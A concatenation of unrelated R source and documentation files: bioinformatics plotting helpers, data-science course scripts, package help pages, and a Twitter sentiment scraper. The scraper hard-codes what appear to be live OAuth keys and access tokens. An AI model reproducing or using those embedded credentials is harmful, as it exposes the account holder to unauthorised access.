#' plotLog2FC
#'
#' Compare log2 fold-change values from two DESeq2 results tables in an
#' x/y scatter plot. Rows are matched by row names; optionally a set of
#' features is highlighted, labelled, and summarised in a legend.
#'
#' @param res1 First results table (anything `as.data.frame()` accepts with a
#'   `log2FoldChange` column); plotted on the x axis.
#' @param res2 Second results table; plotted on the y axis. Matched to
#'   `res1` by row names.
#' @param main_title Plot title.
#' @param x_label,y_label Axis labels.
#' @param lims Length-2 numeric vector used for both axis limits.
#' @param point_size,point_color Size and color of the background points.
#' @param selection_ids Optional vector of feature ids to highlight.
#' @param selection_id_type Name (before the merge suffix) of the column in
#'   `res1`/`res2` holding those ids, e.g. "symbol".
#' @param selection_color,selection_point_size Appearance of highlighted points.
#' @param selection_legend Optional legend text for the highlighted points.
#' @param selection_text_label Label highlighted points with their id?
#' @param selection_text_size,selection_text_adj Size and vertical adjustment
#'   of those labels.
#' @param add_lowess_line Add a lowess smooth through all points?
#' @param lowess_line_color,lowess_line_width Appearance of the lowess line.
#' @param legend_pos Legend position keyword passed to [legend()].
#' @return Called for its side effect (a base-graphics plot).
#' @export
plotLog2FC <- function(res1,
                       res2,
                       main_title = "",
                       x_label = "log2FC",
                       y_label = "log2FC",
                       lims = c(-5,5),
                       point_size = 0.25,
                       point_color = rgb(0.7,0.7,0.7,0.5),
                       selection_ids = NULL,
                       selection_id_type = "symbol",
                       selection_color = rgb(0.8,0,0,1),
                       selection_point_size = 0.5,
                       selection_legend = NULL,
                       selection_text_label = FALSE,
                       selection_text_size = 1.1,
                       selection_text_adj = -0.5,
                       add_lowess_line = F,
                       lowess_line_color = rgb(0.7,0,0.9,1),
                       lowess_line_width = 1.5,
                       legend_pos = "topleft"){

    # Match the two result tables feature-by-feature via row names; merge()
    # suffixes shared column names with .x (res1) and .y (res2).
    res_merged <- merge(x = as.data.frame(res1),
                        y = as.data.frame(res2),
                        by = "row.names")

    plot(x = res_merged$log2FoldChange.x,
         y = res_merged$log2FoldChange.y,
         main = main_title,  # bug fix: main_title was accepted but never used
         xlab = x_label,
         ylab = y_label,
         ylim = lims,
         xlim = lims,
         col = point_color,
         pch = 19, cex = point_size)

    if(add_lowess_line){
        lines(lowess(x = res_merged$log2FoldChange.x, y = res_merged$log2FoldChange.y),
              col = lowess_line_color, lwd = lowess_line_width)
    }

    # Axes through the origin, plus the identity (y = x) reference line.
    abline(h=0, v=0, col="grey32")
    abline(coef = c(0,1), col="grey32", lty=2)

    if(!(is.null(selection_ids))){
        # Ids are looked up in the res1 copy of the id column (suffix .x).
        selection_id_type <- paste0(selection_id_type, ".x")
        selection_vector <- res_merged[selection_id_type][,1] %in% selection_ids

        points(x = res_merged$log2FoldChange.x[selection_vector],
               y = res_merged$log2FoldChange.y[selection_vector],
               col = selection_color,
               pch = 19, cex = selection_point_size)

        if(selection_text_label){
            text(x = res_merged$log2FoldChange.x[selection_vector],
                 y = res_merged$log2FoldChange.y[selection_vector],
                 labels = res_merged[selection_id_type][,1][selection_vector],
                 adj = c(0, selection_text_adj),
                 col = selection_color, cex = selection_text_size)
        }
    } else {
        selection_vector <- FALSE
    }

    # Draw the legend only if something was actually highlighted.
    if(!(is.null(selection_legend)) & sum(selection_vector) > 0){
        legend(legend_pos,
               legend = c(selection_legend),
               bg = "white",
               col = c(selection_color), pch = 19, cex = 1)
    }
}
| /R/plotLog2FC.R | permissive | tschauer/HelpersforDESeq2 | R | false | false | 3,030 | r | #' plotLog2FC
#'
#' Compare log2 fold-change values from two DESeq2 results tables in an
#' x/y scatter plot. Rows are matched by row names; optionally a set of
#' features is highlighted, labelled, and summarised in a legend.
#'
#' @param res1 First results table (anything `as.data.frame()` accepts with a
#'   `log2FoldChange` column); plotted on the x axis.
#' @param res2 Second results table; plotted on the y axis. Matched to
#'   `res1` by row names.
#' @param main_title Plot title.
#' @param x_label,y_label Axis labels.
#' @param lims Length-2 numeric vector used for both axis limits.
#' @param point_size,point_color Size and color of the background points.
#' @param selection_ids Optional vector of feature ids to highlight.
#' @param selection_id_type Name (before the merge suffix) of the column in
#'   `res1`/`res2` holding those ids, e.g. "symbol".
#' @param selection_color,selection_point_size Appearance of highlighted points.
#' @param selection_legend Optional legend text for the highlighted points.
#' @param selection_text_label Label highlighted points with their id?
#' @param selection_text_size,selection_text_adj Size and vertical adjustment
#'   of those labels.
#' @param add_lowess_line Add a lowess smooth through all points?
#' @param lowess_line_color,lowess_line_width Appearance of the lowess line.
#' @param legend_pos Legend position keyword passed to [legend()].
#' @return Called for its side effect (a base-graphics plot).
#' @export
plotLog2FC <- function(res1,
                       res2,
                       main_title = "",
                       x_label = "log2FC",
                       y_label = "log2FC",
                       lims = c(-5,5),
                       point_size = 0.25,
                       point_color = rgb(0.7,0.7,0.7,0.5),
                       selection_ids = NULL,
                       selection_id_type = "symbol",
                       selection_color = rgb(0.8,0,0,1),
                       selection_point_size = 0.5,
                       selection_legend = NULL,
                       selection_text_label = FALSE,
                       selection_text_size = 1.1,
                       selection_text_adj = -0.5,
                       add_lowess_line = F,
                       lowess_line_color = rgb(0.7,0,0.9,1),
                       lowess_line_width = 1.5,
                       legend_pos = "topleft"){

    # Match the two result tables feature-by-feature via row names; merge()
    # suffixes shared column names with .x (res1) and .y (res2).
    res_merged <- merge(x = as.data.frame(res1),
                        y = as.data.frame(res2),
                        by = "row.names")

    plot(x = res_merged$log2FoldChange.x,
         y = res_merged$log2FoldChange.y,
         main = main_title,  # bug fix: main_title was accepted but never used
         xlab = x_label,
         ylab = y_label,
         ylim = lims,
         xlim = lims,
         col = point_color,
         pch = 19, cex = point_size)

    if(add_lowess_line){
        lines(lowess(x = res_merged$log2FoldChange.x, y = res_merged$log2FoldChange.y),
              col = lowess_line_color, lwd = lowess_line_width)
    }

    # Axes through the origin, plus the identity (y = x) reference line.
    abline(h=0, v=0, col="grey32")
    abline(coef = c(0,1), col="grey32", lty=2)

    if(!(is.null(selection_ids))){
        # Ids are looked up in the res1 copy of the id column (suffix .x).
        selection_id_type <- paste0(selection_id_type, ".x")
        selection_vector <- res_merged[selection_id_type][,1] %in% selection_ids

        points(x = res_merged$log2FoldChange.x[selection_vector],
               y = res_merged$log2FoldChange.y[selection_vector],
               col = selection_color,
               pch = 19, cex = selection_point_size)

        if(selection_text_label){
            text(x = res_merged$log2FoldChange.x[selection_vector],
                 y = res_merged$log2FoldChange.y[selection_vector],
                 labels = res_merged[selection_id_type][,1][selection_vector],
                 adj = c(0, selection_text_adj),
                 col = selection_color, cex = selection_text_size)
        }
    } else {
        selection_vector <- FALSE
    }

    # Draw the legend only if something was actually highlighted.
    if(!(is.null(selection_legend)) & sum(selection_vector) > 0){
        legend(legend_pos,
               legend = c(selection_legend),
               bg = "white",
               col = c(selection_color), pch = 19, cex = 1)
    }
}
|
# Row identifier for the submission files (one row per test observation).
# `test`, `bayes.pred`, `bayes.es`, `rpart.pred2`, `ridge.pred` and
# `f3.es1` are expected to exist from earlier model-fitting scripts.
id <- seq_len(nrow(test))

# Averaged naive-Bayes ensemble predictions.
bayes.report <- data.frame(id = id, pred = bayes.pred / length(bayes.es[[1]]))
# bug fix: write.csv() ignores col.names (with a warning), so it is not passed.
write.csv(bayes.report, file = "bayes.csv", row.names = FALSE)

# Blend rpart, naive-Bayes and ridge predictions by summing row-wise and
# rescaling by the ensemble size.
final.pred <- data.frame(id = id,
                         pred = rowSums(cbind(rpart.pred2, bayes.pred, ridge.pred)) / length(f3.es1[[1]]))
write.csv(final.pred, file = "RpartLogitbayesRidge.std.csv", row.names = FALSE)
| /code/Submission/final.run.R | no_license | hetong007/Credit | R | false | false | 344 | r | id=1:nrow(test)
# Averaged naive-Bayes ensemble predictions (`id`, `bayes.pred`, etc. are
# expected to exist from earlier model-fitting scripts).
bayes.report <- data.frame(id = id, pred = bayes.pred / length(bayes.es[[1]]))
# bug fix: write.csv() ignores col.names (with a warning), so it is not passed.
write.csv(bayes.report, file = "bayes.csv", row.names = FALSE)

# Blend rpart, naive-Bayes and ridge predictions by summing row-wise and
# rescaling by the ensemble size.
final.pred <- data.frame(id = id,
                         pred = rowSums(cbind(rpart.pred2, bayes.pred, ridge.pred)) / length(f3.es1[[1]]))
write.csv(final.pred, file = "RpartLogitbayesRidge.std.csv", row.names = FALSE)
|
## plot4.R -- draws a 2x2 panel of time-series plots (plot4.png) from the UCI
## household power consumption data for 1-2 Feb 2007.

# Load lubridate for dmy_hms() date-time parsing.
library(lubridate)
# Download and unzip the raw data into the working directory.
download.file("https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip", "data.zip")
unzip("data.zip")
# Read the data; missing values are encoded as "?".
# `TRUE` is spelled out (the original `header=T` relies on the reassignable `T`).
data <- read.table("household_power_consumption.txt", header = TRUE, sep = ";", na.strings = "?")
# Combine the Date and Time columns into a single POSIXct timestamp.
data$Timestamp <- dmy_hms(paste(as.character(data$Date), as.character(data$Time)))
# Temporarily switch to an English locale so weekday labels render in English;
# the caller's locale is saved here and restored at the end of the script.
loc <- Sys.getlocale("LC_TIME")
Sys.setlocale("LC_TIME", "English")
# Keep only the rows for 1-2 Feb 2007 -- the file is ordered by date, so the
# first match of 1/2/2007 through the last match of 2/2/2007 spans the range.
subdata <- data[min(which(data$Date == "1/2/2007")):max(which(data$Date == "2/2/2007")), ]
#### Create plot 4: a 2x2 grid written to plot4.png.
png("plot4.png", width = 480, height = 480)
par(mfrow = c(2, 2))
plot(subdata$Timestamp, subdata$Global_active_power, type = "l", ylab = "Global Active Power", xlab = "")
plot(subdata$Timestamp, subdata$Voltage, type = "l", xlab = "datetime", ylab = "Voltage")
plot(subdata$Timestamp, subdata$Sub_metering_1, type = "l", ylab = "Energy sub metering", xlab = "")
lines(subdata$Timestamp, subdata$Sub_metering_2, col = "red")
lines(subdata$Timestamp, subdata$Sub_metering_3, col = "blue")
leg.text <- c("Sub_metering_1", "Sub_metering_2", "Sub_metering_3")
legend("topright", leg.text, lty = 1, col = c("black", "red", "blue"), bty = "n")
plot(subdata$Timestamp, subdata$Global_reactive_power, type = "l", ylab = "Global_reactive_power", xlab = "datetime")
dev.off()
# Restore the caller's locale.
Sys.setlocale("LC_TIME", loc)
library(lubridate)
#Download and unzip data
download.file("https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip", "data.zip")
unzip("data.zip")
#Read date
data <- read.table("household_power_consumption.txt", header=T, sep=";", na.strings = "?")
#Create Timestamp Variable
data$Timestamp <- dmy_hms(paste(as.character(data$Date), as.character(data$Time)))
#Reformat locale timestamp to allow for weekday in English
loc <- Sys.getlocale("LC_TIME")
Sys.setlocale("LC_TIME", "English")
#Subset data
subdata <- data[min(which(data$Date=="1/2/2007")):max((which(data$Date=="2/2/2007"))),]
####Create plot 4
png("plot4.png", width = 480, height = 480)
par(mfrow=c(2,2))
plot(subdata$Timestamp, subdata$Global_active_power, type="l", ylab="Global Active Power", xlab="")
plot(subdata$Timestamp, subdata$Voltage, type="l", xlab="datetime", ylab="Voltage")
plot(subdata$Timestamp, subdata$Sub_metering_1, type="l", ylab="Energy sub metering", xlab="")
lines(subdata$Timestamp, subdata$Sub_metering_2, col="red")
lines(subdata$Timestamp, subdata$Sub_metering_3, col="blue")
leg.text <- c("Sub_metering_1", "Sub_metering_2", "Sub_metering_3")
legend("topright", leg.text, lty=1, col=c("black", "red", "blue"), bty="n")
plot(subdata$Timestamp, subdata$Global_reactive_power, type="l", ylab="Global_reactive_power", xlab="datetime")
dev.off()
#reset locale
Sys.setlocale("LC_TIME", loc) |
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ScoreTest.R
\docType{methods}
\name{BGScoreTest}
\alias{BGScoreTest}
\alias{BGScoreTest,NanoStringGeoMxSet-method}
\alias{BGScoreTest,matrix-method}
\title{Testing for features above the background}
\usage{
BGScoreTest(object, ...)
\S4method{BGScoreTest}{NanoStringGeoMxSet}(
object,
split = FALSE,
adj = 1,
removeoutlier = FALSE,
useprior = FALSE
)
\S4method{BGScoreTest}{matrix}(
object,
BGmod,
adj = 1,
probenum,
removeoutlier = FALSE,
useprior = FALSE
)
}
\arguments{
\item{object}{count matrix with features in rows and samples in columns}
\item{...}{additional argument list that might be used}
\item{split}{indicator variable on whether it is for multiple slides (Yes, TRUE; No, FALSE)}
\item{adj}{adjustment factor for the number of feature in each gene, default =1 i.e.
each target only consists of one probe}
\item{removeoutlier}{whether to remove outliers}
\item{useprior}{whether to use the prior that the expression level of background follows a Beta distribution,
leading to a more conservative test}
\item{BGmod}{a list of sizefact, featfact, and countmat}
\item{probenum}{a vector of numbers of probes in each gene}
}
\value{
a valid GeoMx S4 object including the following items
\itemize{
\item pvalues - Background score test pvalues, in featureData
\item scores - Background score test statistics, in featureData
}
if split is TRUE, a valid GeoMx S4 object including the following items
\itemize{
\item pvalues_XX - Background score test pvalues vector, column name (denoted as XX) the same as slide names, in featureData
\item scores_XX - Background score test statistics vector, column name (denoted as XX) the same as slide names, in featureData
}
a list of following items
\itemize{
\item pvalues - Background score test pvalues
\item scores - Background score test statistics
}
}
\description{
Testing for features above the background using Poisson background model as reference
Testing for features above the background using Poisson background model as reference
}
\examples{
data(demoData)
demoData <- fitPoisBG(demoData, size_scale = "sum")
demoData <- aggreprobe(demoData, use = "cor")
demoData <- BGScoreTest(demoData, adj = 1, useprior = FALSE)
demoData <- fitPoisBG(demoData, size_scale = "sum", groupvar = "slide name")
demoData <- BGScoreTest(demoData, adj = 1, useprior = TRUE, split = TRUE)
}
| /man/BGScoreTest-methods.Rd | permissive | JasonWReeves/GeoDiff | R | false | true | 2,455 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/ScoreTest.R
\docType{methods}
\name{BGScoreTest}
\alias{BGScoreTest}
\alias{BGScoreTest,NanoStringGeoMxSet-method}
\alias{BGScoreTest,matrix-method}
\title{Testing for features above the background}
\usage{
BGScoreTest(object, ...)
\S4method{BGScoreTest}{NanoStringGeoMxSet}(
object,
split = FALSE,
adj = 1,
removeoutlier = FALSE,
useprior = FALSE
)
\S4method{BGScoreTest}{matrix}(
object,
BGmod,
adj = 1,
probenum,
removeoutlier = FALSE,
useprior = FALSE
)
}
\arguments{
\item{object}{count matrix with features in rows and samples in columns}
\item{...}{additional argument list that might be used}
\item{split}{indicator variable on whether it is for multiple slides (Yes, TRUE; No, FALSE)}
\item{adj}{adjustment factor for the number of feature in each gene, default =1 i.e.
each target only consists of one probe}
\item{removeoutlier}{whether to remove outlier}
\item{useprior}{whether to use the prior that the expression level of background follows a Beta distribution,
leading to a more conservative test}
\item{BGmod}{a list of sizefact, sizefact, and countmat}
\item{probenum}{a vector of numbers of probes in each gene}
}
\value{
a valid GeoMx S4 object including the following items
\itemize{
\item pvalues - Background score test pvalues, in featureData
\item scores - Background score test statistics, in featureData
}
if split is TRUE, a valid GeoMx S4 object including the following items
\itemize{
\item pvalues_XX - Background score test pvalues vector, column name (denoted as XX) the same as slide names, in featureData
\item scores_XX - Background score test statistics vector, column name (denoted as XX) the same as slide names, in featureData
}
a list of following items
\itemize{
\item pvalues - Background score test pvalues
\item scores - Background score test statistics
}
}
\description{
Testing for features above the background using Poisson background model as reference
Testing for features above the background using Poisson background model as reference
}
\examples{
data(demoData)
demoData <- fitPoisBG(demoData, size_scale = "sum")
demoData <- aggreprobe(demoData, use = "cor")
demoData <- BGScoreTest(demoData, adj = 1, useprior = FALSE)
demoData <- fitPoisBG(demoData, size_scale = "sum", groupvar = "slide name")
demoData <- BGScoreTest(demoData, adj = 1, useprior = TRUE, split = TRUE)
}
|
library(twitteR)
## NOTE(review): live API credentials are hard-coded below. They are kept
## verbatim so existing runs keep working, but they should be revoked and
## loaded from environment variables instead of being committed to source.
setup_twitter_oauth('v4G2SxDIGAdgJonVdpgoXmdZQ','cM58GB3vVuuNscnAJ8uC7UwVpwHHE59WWnBrrV3kyUzY1W8Ak6','146841885-jaZbsQjJrHE6maZhn5nGC0UFNPP6rrULd1DB6C39','56tewGvrNgtcDExLmXGc94dyWWsho14umruVKGyENuW58')
## Pull tweets for the two Lenovo accounts.
lenovo_health <- searchTwitteR("LenovoHealthUS+@LenovoHealthUS", n = 10000, lang = "en")
lenovo_na <- searchTwitter("@LenovoChannelNA", n = 10000)
## Flatten the lists of status objects into one-column (text) data frames.
lenovo_health_df <- do.call("rbind", lapply(lenovo_health, as.data.frame))
lenovo_health_df <- subset(lenovo_health_df, select = c(text))
lenovo_na_df <- do.call("rbind", lapply(lenovo_na, as.data.frame))
lenovo_na_df <- subset(lenovo_na_df, select = c(text))
## Strip noise from the raw tweet text. Substitutions run in order; removing
## [[:blank:]] first deletes every space, so the cleaned text is one unbroken
## string (kept as-is to match the original pipeline's output).
clean_tweets <- function(text, extra_terms = character()) {
  text <- gsub("[[:blank:]]", "", text)
  text <- gsub("[[:punct:]]", "", text)
  ## BUG FIX: the original used "[[:ctrl:]]", an invalid POSIX class name that
  ## makes gsub() fail with "invalid regular expression"; the correct class
  ## is [[:cntrl:]].
  text <- gsub("[[:cntrl:]]", "", text)
  text <- gsub("[[:digit:]]", "", text)
  text <- gsub("(RT|via)((?:\\b\\W*@\\w+)+)", " ", text)
  text <- gsub("@\\w+", "", text)
  text <- gsub("http\\w+", "", text)
  text <- gsub("RT", "", text)
  text <- gsub("Lenovo", "", text)
  text <- gsub("HealthUS", "", text)
  for (term in extra_terms) {
    text <- gsub(term, "", text)
  }
  text
}
lenovo_health_df$text <- clean_tweets(lenovo_health_df$text)
lenovo_na_df$text <- clean_tweets(lenovo_na_df$text, extra_terms = "ChannelNA")
## Drop duplicate tweets, keeping only the text column.
lenovo_health_df["DuplicatedTweets"] <- duplicated(lenovo_health_df$text)
lenovo_health_df <- subset(lenovo_health_df, lenovo_health_df$DuplicatedTweets == "FALSE")
lenovo_health_df <- subset(lenovo_health_df, select = c(text))
lenovo_na_df["DuplicatedTweets"] <- duplicated(lenovo_na_df)
lenovo_na_df <- subset(lenovo_na_df, lenovo_na_df$DuplicatedTweets == "FALSE")
lenovo_na_df <- subset(lenovo_na_df, select = c(text))
| /Lenovo.R | no_license | tanvibobde/Sentiment-Analysis | R | false | false | 2,438 | r | library(twitteR)
setup_twitter_oauth('v4G2SxDIGAdgJonVdpgoXmdZQ','cM58GB3vVuuNscnAJ8uC7UwVpwHHE59WWnBrrV3kyUzY1W8Ak6','146841885-jaZbsQjJrHE6maZhn5nGC0UFNPP6rrULd1DB6C39','56tewGvrNgtcDExLmXGc94dyWWsho14umruVKGyENuW58')
lenovo_health <- searchTwitteR("LenovoHealthUS+@LenovoHealthUS",n=10000,lang = "en")
lenovo_na <- searchTwitter("@LenovoChannelNA",n=10000)
lenovo_health_df <- do.call("rbind", lapply(lenovo_health,as.data.frame))
lenovo_health_df <- subset(lenovo_health_df,select = c(text))
lenovo_na_df <- do.call("rbind",lapply(lenovo_na,as.data.frame))
lenovo_na_df <- subset(lenovo_na_df,select=c(text))
# Cleaning All the Tweets
lenovo_health_df$text <- gsub("[[:blank:]]","",lenovo_health_df$text)
lenovo_health_df$text <- gsub("[[:punct:]]","",lenovo_health_df$text)
lenovo_health_df$text <- gsub("[[:ctrl:]]","",lenovo_health_df$text)
lenovo_health_df$text <- gsub("[[:digit:]]","",lenovo_health_df$text)
lenovo_health_df$text = gsub("(RT|via)((?:\\b\\W*@\\w+)+)", " ", lenovo_health_df$text)
lenovo_health_df$text = gsub("@\\w+", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("http\\w+", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("RT", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("Lenovo", "", lenovo_health_df$text)
lenovo_health_df$text = gsub("HealthUS", "", lenovo_health_df$text)
lenovo_na_df$text <- gsub("[[:blank:]]","",lenovo_na_df$text)
lenovo_na_df$text <- gsub("[[:punct:]]","",lenovo_na_df$text)
lenovo_na_df$text <- gsub("[[:ctrl:]]","",lenovo_na_df$text)
lenovo_na_df$text <- gsub("[[:digit:]]","",lenovo_na_df$text)
lenovo_na_df$text = gsub("(RT|via)((?:\\b\\W*@\\w+)+)", " ", lenovo_na_df$text)
lenovo_na_df$text = gsub("@\\w+", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("http\\w+", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("RT", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("Lenovo", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("HealthUS", "", lenovo_na_df$text)
lenovo_na_df$text = gsub("ChannelNA", "", lenovo_na_df$text)
lenovo_health_df["DuplicatedTweets"] <- duplicated(lenovo_health_df$text)
lenovo_health_df <- subset(lenovo_health_df,lenovo_health_df$DuplicatedTweets=="FALSE")
lenovo_health_df <- subset(lenovo_health_df,select = c(text))
lenovo_na_df["DuplicatedTweets"] <- duplicated(lenovo_na_df)
lenovo_na_df <- subset(lenovo_na_df,lenovo_na_df$DuplicatedTweets=="FALSE")
lenovo_na_df <- subset(lenovo_na_df,select = c(text))
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/NCMCVh.R
\name{NCMCVh}
\alias{NCMCVh}
\title{NCMCVh}
\usage{
NCMCVh(Y, u, h, ktype = "gaussian")
}
\arguments{
\item{Y}{the observation, p * n matrix}
\item{u}{the condition, it is a vector, one-dimensional array or
one-dimensional row(column) matrix}
\item{h}{the bandwidth, scalar}
\item{ktype}{the kernel type, can be "gaussian", "epanech", "triweight",
"biweight", "tricube", "triangular" and "cosine",
the default of ktype is "gaussian".}
}
\value{
the value of the cross-validation function
}
\description{
This routine calculates the cross-validation value using the NCM method.
}
\examples{
\dontrun{
data(u)
data(LowerBoundary)
data(Ystd_LC)
upper <- 1
h_grid <- matrix(seq(0.05, upper, length.out = 100), nrow = 100)
cv <- apply(h_grid, 1, NCMCVh, Y = Ystd_LC, u = u)
plot(h_grid,cv, type = 'l', xlab = "Bandwidth", ylab = "CV Values", col = "blue")
# select the optimal bandwidth for diagonal entries of covariance
hncm <- optimise(NCMCVh, c(LowerBoundary, upper), tol = 1e-6,
Y = Ystd_LC, u = u)
abline(v = hncm$minimum, col="red")
}
}
\seealso{
\code{\link{CVLL}}
}
| /man/NCMCVh.Rd | no_license | Jieli12/llfdr | R | false | true | 1,171 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/NCMCVh.R
\name{NCMCVh}
\alias{NCMCVh}
\title{NCMCVh}
\usage{
NCMCVh(Y, u, h, ktype = "gaussian")
}
\arguments{
\item{Y}{the observation, p * n matrix}
\item{u}{the condition, it is a vector, one-dimensional array or
one-dimensional row(column) matrix}
\item{h}{the bandwidth, scalar}
\item{ktype}{the kernel type, can be "gaussian", "epanech", "triweight",
"biweight", "tricube", "triangular" and "cosine",
the default of ktype is "gaussian".}
}
\value{
the value of cross validation function
}
\description{
This routine calculate the cross validation value using NCM method.
}
\examples{
\dontrun{
data(u)
data(LowerBoundary)
data(Ystd_LC)
upper <- 1
h_grid <- matrix(seq(0.05, upper, length.out = 100), nrow = 100)
cv <- apply(h_grid, 1, NCMCVh, Y = Ystd_LC, u = u)
plot(h_grid,cv, type = 'l', xlab = "Bandwidth", ylab = "CV Values", col = "blue")
# select the optimal bandwidth for diagonal entries of covariance
hncm <- optimise(NCMCVh, c(LowerBoundary, upper), tol = 1e-6,
Y = Ystd_LC, u = u)
abline(v = hncm$minimum, col="red")
}
}
\seealso{
\code{\link{CVLL}}
}
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/zipWRUdata.R
\docType{data}
\name{zip_all_census2}
\alias{zip_all_census2}
\title{WRU formatted racial demographics ZIP code data}
\format{
A data frame with 297,351 rows and 16 variables:
\describe{
\item{state_name}{State's name, all capitalized}
\item{zcta5}{The string padded 5 digit ZIP code}
\item{total_pop}{Total population for the ZIP code}
\item{q_whi}{The population for non-hispanic whites}
\item{q_bla}{The population for non-hispanic blacks}
\item{q_his}{The population for hispanics}
\item{q_asi}{The population for non-hispanic Asians and pacific islanders}
\item{q_oth}{The population for non-hispanic all other races}
\item{r_whi}{The proportion of the non-hispanic white population that lives within a ZIP code relative to the given state}
\item{r_bla}{The proportion of the non-hispanic black population that lives within a ZIP code relative to the given state}
\item{r_his}{The proportion of the hispanic population that lives within a ZIP code relative to the given state}
\item{r_asi}{The proportion of the non-hispanic asian and pacific islander population that lives within a ZIP code relative to the given state}
\item{r_oth}{The proportion of the non-hispanic other population that lives within a ZIP code relative to the given state}
\item{type}{The source of the data to be specified for prediction purposes. Takes either the values of census or acs}
\item{year}{The year for the data. The Census data is from 2010, and the ACS data runs from 2011 to 2018.}
\item{state_po}{The state postal code.}
}
}
\source{
U.S. Census Bureau. (2011--2018). 2011-2018 American Community Survey (ACS) 5-year Detailed ZCTA Level Data. Geographic Level 860,
Tables: B01001C -- B01001I. Public Use Microdata Samples \link{JSON Data file}. Retrieved from (see sources_dataframe for links).
}
\usage{
zip_all_census2
}
\description{
A dataset containing the number of each racial demographic in U.S. ZIP codes for the purpose of running the wru BISG package. Includes data
from the Census (2010) and every 5 year ACS up to 2018. Additionally, presents data in crosswalk format such that the data can be run by
state.
}
\keyword{datasets}
| /zipWRUext2/man/zip_all_census2.Rd | no_license | ckann10/zipWRUext | R | false | true | 2,228 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/zipWRUdata.R
\docType{data}
\name{zip_all_census2}
\alias{zip_all_census2}
\title{WRU formatted racial demographics ZIP code data}
\format{
A data frame with 297,351 rows and 16 variables:
\describe{
\item{state_name}{State's name, all capitalized}
\item{zcta5}{The string padded 5 digit ZIP code}
\item{total_pop}{Total population for the ZIP code}
\item{q_whi}{The population for non-hispanic whites}
\item{q_bla}{The population for non-hispanic blacks}
\item{q_his}{The population for hispanics}
\item{q_asi}{The population for non-hispanic Asians and pacific islanders}
\item{q_oth}{The population for non-hispanic all other races}
\item{r_whi}{The proportion of the non-hispanic white population that lives within a ZIP code relative to the given state}
\item{r_bla}{The proportion of the non-hispanic black population that lives within a ZIP code relative to the given state}
\item{r_his}{The proportion of the hispanic population that lives within a ZIP code relative to the given state}
\item{r_asi}{The proportion of the non-hispanic asian and pacific islander population that lives within a ZIP code relative to the given state}
\item{r_oth}{The proportion of the non-hispanic other population that lives within a ZIP code relative to the given state}
\item{type}{The source of the data to be specified for prediction purposes. Takes either the values of census or acs}
\item{year}{The year for the data. The Census data is from 2010, and the acs data runs from 2011 to 2018.}
\item{state_po}{The state postal code.}
}
}
\source{
U.S. Census Bureau. (2011--2018). 2011-2018 American Community Survey (ACS) 5-year Detailed ZCTA Level Data. Geographic Level 860,
Tables: B01001C -- B01001I. Public Use Microdata Samples \link{JSON Data file}. Retrieved from (see sources_dataframe for links).
}
\usage{
zip_all_census2
}
\description{
A dataset containing the number of each racial demographic in U.S. ZIP codes for the purpose of running the wru BISG package. Includes data
from the Census (2010) and every 5 year ACS up to 2018. Additionally, presents data in crosswalk format such that the data can be run by
state.
}
\keyword{datasets}
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/color.r
\name{can_change_color}
\alias{can_change_color}
\title{does the terminal support colors and allow changing their definitions}
\usage{
can_change_color()
}
\value{
TRUE if and only if it can
}
\description{
Lots of terminals do not support it.
Setting TERM=xterm-256color in terminology on Ubuntu seems to enable
support for it (on terminology and gnome-terminal)
}
\seealso{
Other color: \code{\link{COLOR_PAIR}}, \code{\link{COLOR}},
\code{\link{PAIR_NUMBER}},
\code{\link{assume_default_colors}},
\code{\link{color_content}}, \code{\link{color_off}},
\code{\link{color_on}}, \code{\link{has_colors}},
\code{\link{init_pair}}, \code{\link{pair_content}},
\code{\link{start_color}},
\code{\link{use_default_colors}}
}
| /Rcurses/man/can_change_color.Rd | no_license | kforner/rcurses | R | false | true | 813 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/color.r
\name{can_change_color}
\alias{can_change_color}
\title{does the terminal supports colors and can change their definitions}
\usage{
can_change_color()
}
\value{
TRUE iff only it can
}
\description{
Lots of terminals do not support it.
Setting TERM=xterm-256color in terminology on ubuntu seem to enable
support for it (on terminology and gnome-terminal)
}
\seealso{
Other color: \code{\link{COLOR_PAIR}}, \code{\link{COLOR}},
\code{\link{PAIR_NUMBER}},
\code{\link{assume_default_colors}},
\code{\link{color_content}}, \code{\link{color_off}},
\code{\link{color_on}}, \code{\link{has_colors}},
\code{\link{init_pair}}, \code{\link{pair_content}},
\code{\link{start_color}},
\code{\link{use_default_colors}}
}
|
setMethod("initialize", "Hypergraph", function(.Object, nodes=character(), hyperedges=list()) {
    ## Initialize a Hypergraph instance: validate the hyperedges against the
    ## node set, give unlabelled hyperedges default positional labels, and
    ## fill the slots.
    ##
    ## nodes: character vector of node names
    ## hyperedges: a list of Hyperedge objects over subsets of `nodes`
    hypergraph:::checkValidHyperedges(hyperedges, nodes)
    .Object@nodes <- nodes
    .Object@hyperedges <- addDefaultHyperedgeLabels(hyperedges)
    .Object
})
Hypergraph <- function(nodes, hyperedges) {
    ## Convenience wrapper around new("Hypergraph", ...).
    new("Hypergraph", nodes = nodes, hyperedges = hyperedges)
}
checkValidHyperedges <- function(hyperedges, nnodes) {
    ## Validate that every element of `hyperedges` is a Hyperedge object and
    ## that every node it references appears in `nnodes` (the node vector of
    ## the enclosing Hypergraph). Stops with an informative error on the
    ## first violation; returns TRUE otherwise.
    isHyperedge <- vapply(hyperedges, is, logical(1), "Hyperedge")
    if (!all(isHyperedge))
        stop("hyperedge list elements must be instances of the Hyperedge class.")
    referenced <- unlist(lapply(hyperedges, nodes))
    missingNodes <- referenced[!(referenced %in% nnodes)]
    if (length(missingNodes) > 0) {
        msg <- paste("The hyperedge list is not valid because it",
                     "specifies nodes not in the node vector:")
